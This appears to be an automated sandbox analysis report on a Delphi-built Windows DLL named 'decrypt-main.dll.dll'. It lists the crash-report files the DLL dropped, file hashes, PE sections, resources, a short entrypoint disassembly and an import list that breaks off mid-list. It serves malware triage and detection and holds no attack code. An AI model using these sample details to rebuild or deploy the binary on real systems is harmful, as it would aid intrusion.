Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER957.tmp.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	4.500167258042371
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg771I9VaWpW8VYSNYm8M4JC2CU6FEjyq85mcX3WptSTSYd:uIjfyI7yb7V9MJjj83WpoOYd
MD5:	08EC22F5886DBB92A702B34AA96F47AC
SHA1:	D59F809B804BFAAEC3574E1608A7A5CE676C749B
SHA-256:	CB2047E6332B95E2A872F1B662ACD3C275B34F3EC3A78E7245F2CBF16516DF5C
SHA-512:	D4EA392A16982E81197E00B2396955876A4E2F42F2EB7E6003495C4C6DE401D958D80CAE4FDE789EF35111FB167B1DB31167808B4E591BA911B08BC96B3A552F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBE8.tmp.dmp

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Mar 13 15:50:56 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	71048
Entropy (8bit):	1.5346934795378822
Encrypted:	false
SSDEEP:	192:RS9d9AvCOML1O5oFn3OVncTwam6m3tSCG/ulL:e9Avdek63kcCB3tSCj9
MD5:	471A91B049ED66986EE8EF0ED2DCAD73
SHA1:	00505AC14E0EBE71D6A4FEBB6B7F1964F4B47175
SHA-256:	B3448ABD4A56978E566A8F6AFD202E65410727D99D1845A35C11E892776F7586
SHA-512:	3D2EACD3994A47FEE344AA41CB6486B24D62AB09A12F5A90351998CCF8E976DAD767707AC2E3B1B3CAD15F4E833B3642EE5B1553BE868823658405D65862ADE0
Malicious:	false
Preview:	MDMP..a..... .......`..e....................................$...~3..........T.......8...........T........... ...h...........P...........<...............................................................................eJ..............Lw......................T.......l..._..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCF2.tmp.WERInternalMetadata.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9080
Entropy (8bit):	3.696122822329319
Encrypted:	false
SSDEEP:	192:R6l7wVeJmi1P86YZzJigmf2INmFhpr789bVICfRyjnm:R6lXJT1P86YN8gmf2IuwVtfB
MD5:	13ED1D898573DE951C71618DE7CFC74C
SHA1:	5BB5BF7D88FDBB1363C4F47888B2583F23C3D167
SHA-256:	56924DC6ADC8EE2E58F35CC45F835B95C753702E61B22FE48A72F236B2FB775D
SHA-512:	F46701CF0092B3917BCBF58174090DBF678F2EA7F0AC626A5109784C06EB60F96D4C0A94558229A271E055BDE452B2B712689480AB0B8FE9280DF2DAE1E83311
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD32.tmp.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4903
Entropy (8bit):	4.46545581557317
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg771I9VaWpW8VYiYm8M4JC2CU/FHRHyq8vhULptSTSDd:uIjfyI7yb7V+JzHWEpoODd
MD5:	DE0D98CD0207448B7C8464C8EF00CC83
SHA1:	27A694136DA0AA3F6400CBA75B8DE33DBB1BF9F5
SHA-256:	EC0D557461F27D8E768C8A1F663DA18069E0DA769ACC5E28455C31A8132B579E
SHA-512:	ED4E459F81526553F65491AABDFBEF2B6937CC1ABA935626FBEF6746362F848F03588D1824F7C286B4E978235E5BCF9EE4F646AE5E96D9B57E8D0594190CCD02
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466364938502888
Encrypted:	false
SSDEEP:	6144:vIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:AXD94zWlLZMM6YFHa+9
MD5:	79A0971362595F4A62F3F046C136B02E
SHA1:	D65368D6CB282F420148AAA011B6982B175DEE56
SHA-256:	363646F47F9352329F420ED8A8C048FF657899493D3F8E759A2FE903BE442D03
SHA-512:	029FA914A44EE839085BCBBF9B689F3DE9A3CCCE06D0FAB8BE05767E5420E891788AC0E2E7C00E72317FBE6F46E2E63751562F6B65B08FD4E52AD5F6F51EDE4B
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*1.<^u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	5.979646090579889
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	decrypt-main.dll.dll
File size:	5'330'944 bytes
MD5:	1715ba4aa4ff4c70e66943076f3236ac
SHA1:	f57bfbe116f915e5525c5eff36b5eb5969282171
SHA256:	faebf87c3ff1345bbd5910fe4633b2b49dc83fe62b400ecaa102594d5edb39f0
SHA512:	ad06e05a1cdc6a92af67c8b96ff708bb92e25e5b021478c7e7f1df13eca9223d107f1de9467d1d24efcf831602ab816d491e68d37b98883b8410642583f7ef48
SSDEEP:	49152:5DEhDXc+rWZtaJ8CifXdpbnaSl+lcOFo66bJeaE3g6XGTkN6h:5WUaJri/zfTsRq
TLSH:	233639BB76A482A9C16EC13ED0E38F00D933B1B61733C6E7629143652E469D46F3F661
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x8167d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:
Time Stamp:	0x65E92BED [Thu Mar 7 02:52:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	e015ba11e1ddaa5380318c50a8051d1f

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 00000180h
dec eax
mov ebp, esp
dec eax
mov dword ptr [ebp+30h], ecx
mov dword ptr [ebp+3Ch], edx
dec esp
mov dword ptr [ebp+40h], eax
nop
dec eax
lea ecx, dword ptr [ebp+48h]
call 00007F22F0B434C5h
cmp eax, 01h
setle cl
dec eax
movzx ecx, cl
mov dword ptr [ebp+0000017Ch], ecx
test eax, eax
jne 00007F22F0F4A502h
dec eax
lea ecx, dword ptr [ebp+48h]
dec eax
lea edx, dword ptr [00000051h]
dec esp
mov eax, dword ptr [ebp+30h]
inc esp
mov ecx, dword ptr [ebp+3Ch]
dec eax
mov eax, dword ptr [ebp+40h]
dec eax
mov dword ptr [esp+20h], eax
call 00007F22F0B4DAE0h
jmp 00007F22F0F4A4DAh
nop
nop
call 00007F22F0B42CE7h
nop
call 00007F22F0B435E1h
mov eax, dword ptr [ebp+0000017Ch]
dec eax
lea esp, dword ptr [ebp+00000180h]
pop ebp
ret
dec eax
lea eax, dword ptr [eax+00h]
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007F22F0B42BECh
dec eax
add esp, 28h
ret
add byte ptr [eax], al
enter 0000h, 00h
add byte ptr [eax], al
add byte ptr [eax], al
nop
push 00000081h
add byte ptr [eax], al
jnc 00007F22F0F4A4ECh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [ebp-7Fh], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+00h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
test al, 48h
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax-54h], ah
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x49b000	0xcc	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x494000	0x5134	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x513000	0x13400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4d4000	0x3e160	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x49d000	0x36e34	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x495500	0x1308	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x49a000	0xf2a	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x423f70	0x424000	b7f27458062548a6937770656e7e3fc1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x425000	0x62620	0x62800	9a2bac6930b172b6685b28ba442630cd	False	0.26204344463832485	data	4.902591015474462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x488000	0xbf9c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x494000	0x5134	0x5200	703a5e532c59ee1f8016d0490c2480cd	False	0.2421875	data	4.251729395494642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x49a000	0xf2a	0x1000	c373d4d2586c9b286933e221aadd59bc	False	0.253662109375	data	3.24473098416006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x49b000	0xcc	0x200	09500bfbbf513ed005e4bb6dff2efa39	False	0.345703125	data	2.4492227742982298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x49c000	0x44	0x200	c8956fe83c39059a06fbaa227b86bb22	False	0.15625	data	1.1709274092963795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x49d000	0x36e34	0x37000	099680a7bdd7617d15c3ab408e1cbd03	False	0.46367631392045455	data	6.45364680864244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0x4d4000	0x3e160	0x3e200	fb0adaccc8febc7d9f0cb5f536122620	False	0.4902186556841046	data	6.396233810440188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x513000	0x13400	0x13400	bb501744d3457770d2c2e99247451795	False	0.24665178571428573	data	5.0560496894268265	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x51432c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x514460	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x514594	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x5146c8	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x5147fc	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x514930	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x514a64	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x514b98	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x514d68	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x514f4c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x51511c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x5152ec	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x5154bc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x51568c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x51585c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x515a2c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x515bfc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x515dcc	0x5c	Device independent bitmap graphic, 6 x 11 x 1, image size 44	English	United States	0.391304347826087
RT_BITMAP	0x515e28	0x5c	Device independent bitmap graphic, 6 x 11 x 1, image size 44	English	United States	0.532608695652174
RT_BITMAP	0x515e84	0x5c	Device independent bitmap graphic, 6 x 11 x 1, image size 44	English	United States	0.4782608695652174
RT_BITMAP	0x515ee0	0x5c	Device independent bitmap graphic, 6 x 11 x 1, image size 44	English	United States	0.5543478260869565
RT_BITMAP	0x515f3c	0x5c	Device independent bitmap graphic, 6 x 11 x 1, image size 44	English	United States	0.4673913043478261
RT_BITMAP	0x515f98	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.328042328042328
RT_BITMAP	0x516408	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.3289241622574956
RT_BITMAP	0x516878	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.40476190476190477
RT_BITMAP	0x516ce8	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.09435626102292768
RT_BITMAP	0x517158	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.23721340388007053
RT_BITMAP	0x5175c8	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.29188712522045857
RT_BITMAP	0x517a38	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.1675485008818342
RT_BITMAP	0x517ea8	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.2892416225749559
RT_BITMAP	0x518318	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.2751322751322751
RT_BITMAP	0x518788	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.30776014109347444
RT_BITMAP	0x518bf8	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.2777777777777778
RT_BITMAP	0x519068	0x46e	Device independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/m	English	United States	0.41887125220458554
RT_STRING	0x5194d8	0x624	data			0.3333333333333333
RT_STRING	0x519afc	0xb3c	data			0.2437413073713491
RT_STRING	0x51a638	0x22c	data			0.4172661870503597
RT_STRING	0x51a864	0x33c	data			0.43719806763285024
RT_STRING	0x51aba0	0x488	data			0.32413793103448274
RT_STRING	0x51b028	0x508	data			0.2694099378881988
RT_STRING	0x51b530	0x494	data			0.40017064846416384
RT_STRING	0x51b9c4	0x3dc	data			0.3248987854251012
RT_STRING	0x51bda0	0x358	data			0.4485981308411215
RT_STRING	0x51c0f8	0x404	StarOffice Gallery theme l, 1677731072 objects, 1st l			0.41245136186770426
RT_STRING	0x51c4fc	0xa0	data			0.7125
RT_STRING	0x51c59c	0xe4	data			0.6359649122807017
RT_STRING	0x51c680	0x2c4	data			0.4138418079096045
RT_STRING	0x51c944	0x254	data			0.4865771812080537
RT_STRING	0x51cb98	0x3d0	data			0.3698770491803279
RT_STRING	0x51cf68	0x3b8	data			0.3760504201680672
RT_STRING	0x51d320	0x47c	data			0.3423344947735192
RT_STRING	0x51d79c	0x38c	data			0.3634361233480176
RT_STRING	0x51db28	0x2c4	data			0.3559322033898305
RT_STRING	0x51ddec	0x3f8	data			0.39173228346456695
RT_STRING	0x51e1e4	0x524	data			0.3844984802431611
RT_STRING	0x51e708	0x4ac	data			0.31605351170568563
RT_STRING	0x51ebb4	0x3b0	data			0.3707627118644068
RT_STRING	0x51ef64	0x39c	data			0.32142857142857145
RT_STRING	0x51f300	0x40c	data			0.3735521235521235
RT_STRING	0x51f70c	0xf4	data			0.5491803278688525
RT_STRING	0x51f800	0xc4	data			0.6275510204081632
RT_STRING	0x51f8c4	0x268	data			0.48863636363636365
RT_STRING	0x51fb2c	0x434	data			0.3308550185873606
RT_STRING	0x51ff60	0x360	data			0.38425925925925924
RT_STRING	0x5202c0	0x2ec	data			0.37566844919786097
RT_STRING	0x5205ac	0x31c	data			0.34296482412060303
RT_RCDATA	0x5208c8	0x10	data			1.5
RT_RCDATA	0x5208d8	0x7c8	data			0.5281124497991968
RT_RCDATA	0x5210a0	0x2	data	English	United States	5.0
RT_RCDATA	0x5210a4	0xc45	Delphi compiled form 'TFJustificativa'			0.3081821076090417
RT_RCDATA	0x521cec	0x2291	Delphi compiled form 'TFReceber'			0.15323765397220024
RT_RCDATA	0x523f80	0xb75	Delphi compiled form 'TF_Abundant'			0.4302761677463348
RT_RCDATA	0x524af8	0xcc9	Delphi compiled form 'TF_FlatLandPianoMovers'			0.43568591506263366
RT_RCDATA	0x5257c4	0x494	Delphi compiled form 'TLoginDialog'			0.48976109215017066
RT_RCDATA	0x525c58	0x3c4	Delphi compiled form 'TPasswordDialog'			0.4678423236514523
RT_GROUP_CURSOR	0x52601c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x526030	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x526044	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x526058	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x52606c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x526080	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x526094	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_VERSION	0x5260a8	0x218	data	English	United States	0.48134328358208955

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
user32.dll	SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MoveWindow, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, 